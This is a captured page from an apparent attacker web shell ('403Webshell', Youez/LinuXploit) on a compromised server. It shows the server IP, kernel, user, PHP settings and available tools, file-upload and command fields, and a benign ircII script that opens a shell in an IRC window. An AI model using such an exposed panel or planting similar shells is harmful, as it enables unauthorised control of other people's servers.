403Webshell
Server IP : 173.236.223.38  /  Your IP : 216.73.216.33
Web Server : Apache
System : Linux vps62975 6.8.0-83-generic #83~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Tue Sep 9 18:19:47 UTC 2 x86_64
User : invmicvps ( 6727287)
PHP Version : 8.3.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/ircII/script/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/ircII/script/shell
#	$eterna: shell,v 1.2 2001/08/12 15:57:12 mrg Exp $
#
# This sets up a shell in an IRCII window.  
# You start it by executing /SHELL.  If creates a window and 
# runs the shell in it, all command from that window go to 
# the shell.  Executing subsequent /SHELL commands makes
# the shell window the current window.  
#
eval assign IRCFLUSH $LIBRARY_PATH/$ARCHITECTURE/flush
assign shell_flag 0
on ^exec_exit shell {
	^window refnum shell kill
	^assign shell_flag 0
}
on ^window_kill shell {
	^exec -kill %shell
	^assign shell_flag 0
}

alias shell if (shell_flag) {^window show shell} {^call_shell}
alias call_shell {
	window new name shell
	exec -name shell -window exec $ircflush $SHELL
	^query %shell
	assign shell_flag 1
}

Youez - 2016 - github.com/yon3zu
LinuXploit